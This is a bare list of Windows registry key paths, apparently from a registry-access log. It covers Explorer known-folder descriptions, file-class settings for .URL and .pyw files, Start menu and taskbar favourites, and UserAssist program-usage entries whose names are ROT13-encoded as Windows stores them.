HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\IconHandler\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\CLSID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pyw\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pyw\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pyw\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.NoConFile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{35786D3C-B075-49b9-88DD-029876E11C01}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{b155bdf8-02f0-451e-9a26-ae317cfd7779}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\SortOrderIndex
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Sversbk Cevingr Oebjfvat.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Zvpebfbsg BarQevir.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\JvaENE\JvaENE.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprff 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npebong Ernqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Rkpry 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Sversbk.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Tbbtyr Puebzr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\BarAbgr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Bhgybbx 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreCbvag 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Choyvfure 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fxlcr sbe Ohfvarff 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jbeq 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\7-Mvc\7-Mvc Svyr Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax
